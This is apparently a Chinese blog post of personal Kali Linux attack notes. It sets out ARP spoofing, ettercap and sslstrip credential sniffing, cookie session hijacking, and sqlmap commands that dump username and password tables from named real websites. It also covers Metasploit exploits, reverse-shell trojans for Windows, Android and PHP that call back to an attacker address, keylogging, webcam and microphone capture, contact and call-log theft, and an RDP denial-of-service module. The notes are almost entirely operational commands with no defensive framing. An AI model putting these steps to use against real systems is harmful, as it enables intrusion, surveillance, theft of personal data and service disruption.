• kali 渗透的一些笔记


    kali实战笔记 17:55 2016/7/19 by: _Silvers

    kali系统安装后的配置及美化
    安装vmwareTools
    tar zxvf VMwareTools-sfsfsfasfasfsaf #解压安装包
    cd 到解压后的安装目录 
    ./ 绿色的可执行文件 #进行安装
    # 等待安装结束,期间根据提示进行y/n确定
    reboot # 重启kali
    kali系统更新及替换国内软件源
    leafpad /etc/apt/sources.list
    注释掉官方的更新源
    复制国内的更新源 #可百度国内更新源地址(新手推荐阿里云的源)
    更新系统
    apt-get update #更新系统
    apt-get dist-upgrade #安装更新
    kali的美化
    apt-get install kde-full #kde桌面的安装
    端口扫描
    nmap -sS 目标ip
    Arp 内网断网
    Arpspoof -i 网卡 -t 目标ip 网关
    获取网卡/网关
    ifconfig
    获取内网ip
    fping -asg 192.168.1.0/24
    Arp 欺骗
    echo 写命令,是不会有回显的
    ehco 1 >proc/sys/net/ipv4/ip_forward
    # 进行IP流量转发
    目标 --》 我的网卡 --》网关
    driftnet --> 获取本机网卡的图片
    driftnet -i eth0 获取本机网卡的图片
    ifconfig #查看网络信息
    iwconfig #查看网卡信息
    kali中查找程序或命令
    ex:sqlmap 
    find / -name sqlmap
    find / -name ettercap
    桌面美化工具 雨滴.exe (window)
    ==============================================================================
    HTTP 帐号密码获取
    Arpspoof --> 欺骗
    Ettercap --> 欺骗 DNS欺骗 流量 嗅探
    实战前的信息采集:
    目标机器: 目标ip,网关
    攻击机器: kali ip
    arpspoof -i eth0 -t 目标ip 网关
    开启ip转发
    echo 1 >/proc/sys/net/ipv4/ip_forward
    cat 查看内容
    cat /proc/sys/net/ipv4/ip_forward
    启动ettercap进行流量嗅探
    ettercap -Tq -i eth0
    -Tq --> -T: 启动文本模式,q:安静模式;
    -i --> i: 网关;
    url解码:www.convertstring.com
    HTTPS 账户密码获取
    进入kali文本模式
    在进入输入用户名界面按ctrl+alt+F1
    开启SSH链接服务
    一、配置SSH参数
    修改sshd_config文件,命令为:
    vi /etc/ssh/sshd_config
    将#PasswordAuthentication no的注释去掉,并且将NO修改为YES //kali中默认是yes
    将PermitRootLogin without-password修改为
    PermitRootLogin yes
    Kali 2.0使用SSH进行远程登录
    然后,保存,退出vim。
    二、启动SSH服务
    命令为:
    /etc/init.d/ssh start 
    或者
    service ssh start
    查看SSH服务状态是否正常运行,命令为:
    /etc/init.d/ssh status
    或者
    service ssh status
    /etc/init.d/ssh start
    ==========================
    vim /etc/ettercap/etter.conf
    修改iptables规则
    去掉注释符号
    保存推出
    sslstrip --》 可以把HTTPS还原为http
    arpspoof -i eth0 -t 目标ip 网关
    开启ip转发
    echo 1 >/proc/sys/net/ipv4/ip_forward
    ettercap -Tq -i eth0
    sslstrip -a -f -k
    缺点:容易出现证书错误!
    ==============================
    会话劫持
    需要的工具
    Arpspoof ==> Arp欺骗
    Wireshark ==> 抓包
    ferret ==> 重新生成抓包后的文件
    hamster ==> 重放流量
    #trip1:基于arp欺骗
    arpspoof
    arpspoof -i eth0 -t 目标ip 网关 
    echo 1 >/proc/sys/net/ipv4/ip_forward
    start Wireshark #开始抓包

    ferret -r cockie.pcap #生成hamster.txt

    #trip2:基于ferret
    ferret -1 eth0
    hamster

    #trip3:基于CookieCadger.jar一键劫持
    install CookieCadger
    选择网卡
    动态截取流量
    ======================================================
    SqlMap 
    asp 网站,大多用的Access 文件 数据库 MSSQL数据库
    数据库

    字段(列)
    sqlmap -u http://www.baidu.com
    -u 检测是否存在注入
    成功,返回数据库信息
    sqlmap -u www.baidu.com --tables
    暴力猜解所有表名(有点慢)
    sqlmap -u http://www.baidu.com --columns -T "user"
    --columns 猜列名 根据user 
    sqlmap -u "http://www.baidu.com" --dump -C "username,password" -T "user"
    --dump 下载数据 -C "username,password"列名
    php 网站, 大多用Mysql
    sqlmap -u "http://www.ggec.com.cn/oneNews.php?id=69" --is-dba
    back-end DBMS:MySQL >= 5.0.0
    sqlmap -u "http://www.ggec.com.cn/oneNews.php?id=69" --dbs
    列出所有数据库
    sqlmap -u "http://www.ggec.com.cn/oneNews.php?id=69" --current-db
    查找自己的数据库
    sqlmap -u "http://www.ggec.com.cn/oneNews.php?id=69" --tables -D "ggec"
    猜解(查询)所有表名 根据 ggec
    sqlmap -u "http://www.ggec.com.cn/oneNews.php?id=69" --columns -T "ggec_admin" -D "ggec"
    查询 所有的列
    sqlmap -u "http://www.ggec.com.cn/oneNews.php?id=69" --dump -C "username,password" -T "ggec_admin" -D "ggec"
    查询列的字段
    www.cmd5.com md5在线加解密站点
    ====================================
    sqlmap cookie注入
    sqlmap -u "http://www.wisefund.com.cn/about.asp" --cookie "id=56" --level 2
    --cookie "" 这里写id的参数,如果是cookie注入,就要把等级提升为level 2
    sqlmap -u "http://www.wisefund.com.cn/about.asp" --tables --cookie "id=56" --level 2
    sqlmap -u "http://www.wisefund.com.cn/about.asp" --columns -T "user" --cookie "id=56" --level 2
    sqlmap -u "http://www.wisefund.com.cn/about.asp" --dump -C "username,password" -T "user" --cookie "id=56" --level 2
    ===========================================================================================================================
    Metasploit 基础
    Exploit 模块 -- 》 漏洞利用
    Payloads -- 》 shellCode 
    use exploit/windows/smb/ms08_067_netapi
    选择漏洞利用模块
    show options
    查看要填入的参数
    set RHOST 192.168.1,100
    set PAYLOAD window/meterpreter/reverse_tcp
    RHOST --> 目标IP
    LHOST --> 本机IP
    exploit --》 执行操作 
    实施攻击成功则反馈
    msfconsole 从终端启动metasploit
    background
    sessions -i number 
    木马 :控制端 服务端
    控制远程 木马程序
    a.根据自己的IP生成一个马
    我的IP 192.168.1.103 55555
    msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.1.103 LPORT=55555
    X> test.exe
    这么下来,就会生成一个test.exe的木马程序
    b. use exploit/multi/handler
    使用handler这个模块
    set PAYLOAD windows/meterpreter/reverse_tcp
    使用这个shellcode

    LHOST = 192.168.1.103
    LRORT = 55555
    这里填写 生成木马的IP和端口
    c. 先执行msf,再执行马
    木马的使用
    注入进程:木马随时有可能被结束掉的
    ps: 得到我们要注入的PID进程
    2036 2004 explorer.exe 桌面进程
    migrate 2036 #注入进程
    远程桌面的开启:
    Run vnc 开启远程桌面
    文件管理功能
    Downlaod 下载文件
    Edit 编辑文件
    Cat 查看文件
    mkdir 创建文件
    Mv 移动文件
    Rm 删除文件
    Upload 上传文件
    Rmdir 删除文件夹
    查看PHP文件: cat hack.php
    下载文件: download hack.php
    删除文件: rm hack.php
    上传文件: upload hack.php
    网络及系统操作
    Arp 查看ARP缓冲表
    Ifconfig 查看IP地址网卡
    Getproxy 获取代理
    Netstat 查看端口链接
    kill 杀死进程
    ps 查看进程
    reboot 重启机器
    reg 修改注册表
    shell 获取shell
    shutdown 关机
    sysinfo 获取电脑信息
    用户操作和其他功能讲解
    enumdesktops 窗体
    keyscan_dump 键盘记录 -- 下载
    keyscan_start 键盘记录 -- 开始
    keyscan_stop 键盘记录 -- 停止
    Uict1 获取键盘鼠标控
    uictl disable keyboard/mouse 禁用键盘/鼠标 
    uictl enable keyboard/mouse 启用键盘/鼠标制权
    record_mic 音频录制
    record_mic -d 10 后台录音10秒
    webcam_chat 查看摄像头接口
    webcam_list 查看摄像头列表
    webcam_stream 摄像头视频获取
    GetSystem 获取高权限
    Hashdump 下载hash
    =========================================================
    Metasploit Androd实战笔记
    Msfpayload android/meterpreter/reverse_tcp LHOST=192.168.1.103 LPROT=55555 
    R > test.apk
    Search 搜索 jpg,png,bmp
    Download 下载 jpg,png,bmp
    webcam_snap 手机截屏 
    webcam_stream -i [1:2?] 手机摄像头监控
    check_root 检测Root
    dump_calllog 下载电话记录
    dump_contacts 下载信息记录
    Geolocate 定位
    ==================================================
    Metasploit服务器蓝屏攻击
    DDos
    服务器开启 3389
    确定目标: 192.168.1.103
    MS12 020
    auxiliary/dos/windows/rdp/ms12_020_maxchannelids
    服务器远程桌面的一个可用模块
    auxiliary/scanner/rdp/ms12_020_check
    扫描主机是否存在漏洞
    RHOST R开头,远程主机 
    auxiliary/dos/windows/rdp/ms12_020_maxchannelids
    目的:比DDos来的更直接一些
    Metasploit生成webshell
    a.在msf中生成一个PHP脚本
    msfpayload php/meterpreter/reverse_tcp LHOST=192.168.1.101 R > web.php
    生成一个PHP脚本
      cat 查看文件内容

  • 相关阅读:
    《JavaScript高级程序设计》学习笔记12篇
    JS学习笔记12_优化
    JS学习笔记11_高级技巧
    JS学习笔记10_Ajax
    JS学习笔记9_JSON
    JS学习笔记8_错误处理
    为什么要在列表组件里写 Key ?
    var、let 和 const 的区别以及暂时性死区
    小程序性能优化要点
    Node require() 加载规则
  • 原文地址:https://www.cnblogs.com/Silvers/p/5843207.html
Copyright © 2020-2023  润新知